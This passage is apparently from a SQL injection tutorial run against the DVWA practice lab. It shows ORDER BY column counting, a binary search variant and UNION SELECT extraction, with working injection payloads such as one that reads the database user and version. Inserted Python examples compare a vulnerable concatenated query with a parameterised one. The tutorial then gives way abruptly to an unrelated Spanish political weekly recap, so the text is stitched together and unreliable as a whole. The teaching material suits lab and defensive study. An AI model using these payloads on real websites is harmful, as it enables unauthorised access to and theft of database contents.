As you can see, it has listed the information of all users. This happened because we cancelled the condition that filters the results with a tautology. It will not always be possible to show all results by generating tautologies; sometimes the application will always show a single result, either because it uses a LIMIT or because it only takes the first element of the response. If you don't quite follow, it may help to review the source code of the application. To do this, click the "View Source" button that appears at the bottom right. If you still have problems you should check again the first and second parts of this series.

6.1 Obtaining the number of selected fields

The first step in exploiting a SQL injection vulnerability is to identify how many fields are being selected in the query. For example, if you have looked at the source code, you will see that the query is something like:

SELECT first_name, last_name FROM users WHERE user_id = '1';

As you can see, two fields are being selected: first_name and last_name. But how can we know this without having the source code?

Sometimes it is enough to generate a syntax error to see the whole SQL query and then get the number of selected fields, but not always. The most common case is that the syntax error shows only a small part of the query and we cannot see how many fields are selected.

There is another method using the ORDER BY clause. This clause allows us to sort the query results by any of the selected fields. For example:

SELECT first_name, last_name FROM users ORDER BY first_name

The query above returns the response sorted by "first_name".

An alternative way to use ORDER BY is to give not the name of the field but its position. Thus:

SELECT first_name, last_name FROM users ORDER BY 1

This also sorts the results by the field "first_name", which is the one that appears in first place. But what happens if you try to sort by a position that does not exist? For example:

SELECT first_name, last_name FROM users ORDER BY 3

Position 3 does not exist because only 2 fields are selected. Therefore this query generates an error like this:

Unknown column '3' in 'order clause'

So, to determine the number of selected fields, the idea is to inject an ORDER BY sorting by the first field, then by the second, and so on incrementally until an error is generated. When that happens we will know how many fields are selected in the query.


6.1.1 Binary search with ORDER BY

This may work, but it is inefficient. What is actually used is a binary search technique. It consists of taking an arbitrary value N and making a query ordered by that value. There are two possible outcomes: the query produces an error or it does not. If an error occurs we deduce that the number of selected fields is less than the N we took. If there is no error, we deduce that the number of fields is equal to or greater than N. In the first case we already have a range containing the number we want (from 1 to N), but in the second we have only set a lower limit (N or more). To obtain an upper limit in the second case we simply query again, this time ordering by 2N, and depending on the response (error or no error) we set an upper limit (N to 2N) or a new lower limit (2N or more) respectively. We repeat this operation until we have a well-defined interval with lower and upper limit. Once the interval is determined we look for its middle element, defined as the integer quotient of the sum of the lower and upper limits divided by two. We then order by the middle element and, depending on the response, take the upper or lower half of the interval as the new interval, with the middle element as the new lower or upper limit respectively. We keep halving the interval until we deduce the number of columns.

To understand it better, an example: if a particular query selected 11 fields, we would do the following. We take as arbitrary N the number 10 (it could be any other).

QUERY                                          RESPONSE   DEDUCTION
select 1,2,3,4,5,6,7,8,9,10,11 ORDER BY 10;    OK         There are 10 or more. Lower limit = 10

The query gave no error. That means there are 10 or more fields, and we still have no upper limit. Now we order by twice N, in this case 20.

QUERY                                          RESPONSE   DEDUCTION
select 1,2,3,4,5,6,7,8,9,10,11 ORDER BY 20;    ERROR      There are fewer than 20. Upper limit = 20

We now have a defined interval with upper limit (20) and lower limit (10). Now we look for the middle element, (10+20)/2 = 15, and order by this value.

QUERY                                          RESPONSE   DEDUCTION
select 1,2,3,4,5,6,7,8,9,10,11 ORDER BY 15;    ERROR      There are fewer than 15. Upper limit = 15

We recalculate the middle element: (10+15)/2 = 12 (integer quotient).

QUERY                                          RESPONSE   DEDUCTION
select 1,2,3,4,5,6,7,8,9,10,11 ORDER BY 12;    ERROR      There are fewer than 12. Upper limit = 12

Middle element: (10+12)/2 = 11

QUERY                                          RESPONSE   DEDUCTION
select 1,2,3,4,5,6,7,8,9,10,11 ORDER BY 11;    OK         There are 11 or more. Lower limit = 11

If there are 11 or more and fewer than 12, by simple deduction 11 fields are being selected. If we had used the incremental technique, 12 queries would have been needed, but with the binary search technique only 5 were necessary (less than half). I hope this example makes the binary search technique clear; it saves us time and is used by many automated exploitation tools.

6.1.2 Practice ORDER BY in DVWA

Now let's do it in DVWA. Using the incremental technique, the injections would be:

INJECTION         RESPONSE
' order by 1 #    nothing happens
' order by 2 #    nothing happens
' order by 3 #    Unknown column '3' in 'order clause'
 


Fig. 6 - Injection ORDER BY.

 


Fig. 7 - Error ORDER BY.
 

Note that we place the # character at the end to comment out the quote that follows. The final query with this injection would look like:

SELECT first_name, last_name FROM users WHERE user_id = '' ORDER BY 3 #';

I leave the practice of deduction by binary search to you.
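To make the two ways of counting columns from section 6.1 concrete, here is an added example in Python; it is not code from the original post. The target is simulated by make_oracle(), a hypothetical stand-in for the web application that answers an injected ORDER BY n with "no error" or "error", exactly as the tables above describe; the function names are my own. count_columns_binary() reproduces the five probes of the 11-column example (10, 20, 15, 12, 11) and generalises to any column count and starting value.

```python
# Added example, not code from the original post: deducing the number of
# selected columns with ORDER BY, incrementally and by binary search, against
# a simulated target. make_oracle() is a hypothetical stand-in for the web
# application; a real DVWA target answers with the normal page (no error) or
# "Unknown column 'N' in 'order clause'" (error).
from typing import Callable, List, Tuple

# True means "ORDER BY n" produced no error, False means it errored.
Oracle = Callable[[int], bool]


def make_oracle(num_columns: int) -> Oracle:
    """Simulate a query that selects num_columns fields."""
    def oracle(n: int) -> bool:
        return 1 <= n <= num_columns
    return oracle


def count_columns_incremental(oracle: Oracle) -> Tuple[int, List[int]]:
    """ORDER BY 1, 2, 3, ... until the first error (section 6.1).

    Returns (number of columns, list of the values probed, in order).
    """
    probes: List[int] = []
    n = 1
    while True:
        probes.append(n)
        if not oracle(n):
            return n - 1, probes
        n += 1


def count_columns_binary(oracle: Oracle, start: int = 10) -> Tuple[int, List[int]]:
    """Binary search as in section 6.1.1.

    Phase 1 finds an interval: if ORDER BY start is OK it is a lower limit and
    we keep doubling until an error gives an upper limit; if it errors, the
    upper limit is start and 1 is a safe lower limit (every SELECT has at least
    one column). Phase 2 halves the interval (lower is OK, upper errors) until
    the two limits are adjacent; lower is then the column count.
    """
    probes: List[int] = []

    def probe(n: int) -> bool:
        probes.append(n)
        return oracle(n)

    start = max(start, 1)
    if probe(start):
        lower, upper = start, 2 * start
        while probe(upper):            # no error: 2N becomes the new lower limit
            lower, upper = upper, 2 * upper
    else:
        lower, upper = 1, start

    while upper - lower > 1:
        mid = (lower + upper) // 2     # integer quotient, as in the post
        if probe(mid):
            lower = mid
        else:
            upper = mid
    return lower, probes


def compare(num_columns: int, start: int = 10) -> Tuple[int, int]:
    """Number of probes each method needs for a query with num_columns fields."""
    oracle = make_oracle(num_columns)
    incremental = len(count_columns_incremental(oracle)[1])
    binary = len(count_columns_binary(oracle, start)[1])
    return incremental, binary


if __name__ == "__main__":
    cols, probes = count_columns_binary(make_oracle(11))
    print(f"11-column query: deduced {cols} via ORDER BY {probes}")
    for n in (2, 11, 40):
        inc, binary = compare(n)
        print(f"{n} columns: incremental {inc} probes, binary search {binary} probes")
```

With the 2 columns of DVWA's query, the binary search starting at 10 needs 4 probes (10, 5, 3, 2) while counting incrementally needs 3, so the saving only appears when the query selects many columns: with 40 columns the incremental method needs 41 probes and the binary search 9. The list of probes each function returns is also the sequence of ORDER BY values that ends up in the web server's access log, which is what makes this pattern easy to spot from the defender's side.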

6.2 Data extraction with UNION SELECT

Well, now we know how many fields are being selected in the query. What follows is to find out which of those fields are displayed to the user on the web page. Not all selected fields are inserted into the response page; some are only used internally by the application. Knowing which fields are visible will help us get, through them, the information we want from the database.

If the application does not display any field in the response we face a case of Blind SQL Injection. For such cases there are other techniques that can be used, but I will explain those later. For now we are only interested in learning how to exploit an ordinary SQLi.

To find out which fields are displayed on the web page we will use the UNION clause. This clause tells MySQL that it should join the results of the query preceding UNION with the results of the query that follows it. However, for this to be possible it is a prerequisite that both queries have the same number of fields. If not, it fails. That is why it was necessary first to learn to deduce the number of fields ;) For example:

SELECT first_name, last_name FROM users WHERE user_id = '1' UNION SELECT first_name, last_name FROM users WHERE user_id = '2';

The union of the queries above selects the data of the users with id 1 and 2.
Although in the example above both queries select the same fields of the same table, this is not really necessary. The only mandatory requirement is that both queries have the same number of fields; otherwise those fields can be constants, function results, columns from different tables or from different databases.
 

So we can build UNION SELECT injections to make our own queries to the database and extract the information we want.

6.2.1 Data extraction practice in DVWA

The first injection with UNION SELECT will be to see which fields are displayed on the website. This can be achieved as follows:

' AND 1=0 UNION SELECT 1,2 #

 


 

Fig. 8 - UNION SELECT injection, visible fields.


The query that reaches the database would look like this:

SELECT first_name, last_name FROM users WHERE user_id = '' AND 1=0 UNION SELECT 1,2 #';

As you can see I added AND 1=0 before UNION. This is to nullify the previous query and show only the results of our injected query.

As a result of our injection, which selects the numbers 1 and 2, we can see them in the response page in the areas corresponding to "First Name" and "Surname" respectively. This means that the two fields of the query are visible. Sometimes only some of them are shown.

Now that we know that fields 1 and 2 are visible, we use them to obtain some information:

' AND 1=0 UNION SELECT user(), version() #

Fig. 9 - User and version of the database.

The functions user() and version() return the database user and the MySQL version respectively. Another interesting function is database(), which returns the name of the current database.
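To close sections 6 and 6.2, an added example in Python that is not DVWA's own code: the low-level lookup rebuilt on an in-memory SQLite table with string concatenation (the shape DVWA's "View Source" shows), beside the same lookup with a bound parameter, both run against the tautology, ORDER BY and UNION SELECT inputs used above. The table rows are constructed, and since SQLite stands in for MySQL the trailing comment is -- instead of #; the function names are my own.

```python
# Added example, not DVWA's own code: the "low" level lookup rebuilt on an
# in-memory SQLite table with string concatenation, beside the same lookup with
# a bound parameter, run against the inputs used in sections 6 and 6.2.
# Sample rows are constructed. Assumption: SQLite is used as a stand-in for
# MySQL, so the trailing comment marker is "--" rather than the "#" of the post.
import sqlite3
from typing import List, Tuple

Row = Tuple[object, object]

# Inputs from the post (comment marker adapted to SQLite).
TAUTOLOGY = "' or ''='"
UNION_PROBE = "' AND 1=0 UNION SELECT 1,2 --"
UNION_INFO = "' AND 1=0 UNION SELECT sqlite_version(), 'db' --"


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for DVWA's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("1", "admin", "admin"), ("2", "Gordon", "Brown"), ("3", "Pablo", "Picasso")],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[Row]:
    """Like DVWA low level: the request parameter is pasted into the SQL text."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, user_id: str) -> List[Row]:
    """Hardened form: the parameter is bound, so it is only ever compared as data."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def run_payload(user_id: str) -> Tuple[List[Row], List[Row]]:
    """Run the same input through both versions; returns (vulnerable, safe) rows."""
    conn = build_db()
    try:
        return find_user_vulnerable(conn, user_id), find_user_safe(conn, user_id)
    finally:
        conn.close()


def order_by_probe(position: int) -> bool:
    """Section 6.1 oracle on the vulnerable query: True if ORDER BY position is accepted."""
    conn = build_db()
    try:
        find_user_vulnerable(conn, f"' ORDER BY {position} --")
        return True
    except sqlite3.OperationalError:  # SQLite: "ORDER BY term out of range"
        return False
    finally:
        conn.close()


if __name__ == "__main__":
    for label, payload in (("normal", "1"), ("tautology", TAUTOLOGY),
                           ("union", UNION_PROBE), ("version", UNION_INFO)):
        vulnerable, safe = run_payload(payload)
        print(f"{label:10} vulnerable -> {vulnerable}  safe -> {safe}")
    print("ORDER BY 2 accepted:", order_by_probe(2), "| ORDER BY 3 accepted:", order_by_probe(3))
```

Running it shows that the parameterised version returns nothing for every injected input, while the concatenated one lists all users, accepts the UNION probe and leaks the engine version. Binding the parameter is the standard fix: the input can no longer change the statement's syntax, so the error-based ORDER BY oracle in order_by_probe() disappears along with the tautology and UNION behaviour.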
 
Well, here we have learned how data extraction works with UNION SELECT. In the next chapter of the series (I have no idea when it will be xD) we will go a little deeper into data extraction.

Greetings and goodbye.


3. Pheasant

Another week ends. Domestically, NNGG Linear City has continued its recruitment campaign in the district by publicising the party's proposals on the street, with our efforts finding wide acceptance among neighbourhood residents. In addition, we were also present at the event marking ten years without military service in Torrejón and at the CAPE of NNGG Moncloa, where dozens of young people spent a great Saturday in a rural setting with enviable camaraderie.

The national scene this week has been marked by two bombshells. First, the fact that Zapatero finally throws in the towel and leaves after the years of depression and decline to which he has subjected our poor Spain. Hopefully the next socialist leader follows in the footsteps of his predecessor and never comes to lead the Kingdom into the economic and institutional crisis in which it is stuck. On the other hand, every day this week more information has emerged about the Pheasant Case (to know more, read the article "Hot Pheasant" on this blog).

On the international scene there do not appear to have been significant changes. The Arab world is as troubled and unstable as ever. In Egypt the rumours do nothing but follow one another, while the allies have succeeded in giving wings to the Libyan rebels. But they are not achieving their full objectives and it seems the week ends in a stalemate, with Libya divided in two... perhaps the operation should be taken one step further and end up finishing off Gaddafi, as was done with Saddam just a few years ago. On the other hand, the Spanish action in the matter is reaching a deplorable level, showing all the international clout we have lost case by case. As regards another hot topic, Japan, we observe how it gradually regains its tranquility; possibly the greatest consequence of the "Fukushima accident" will be a special emphasis on safety measures, which is always a good thing. A note apart for the upsurge of violence in Afghanistan and Pakistan, along with the struggle for the presidency in Ivory Coast.

Little more to say. It only remains to say goodbye and wish you good luck for the coming week.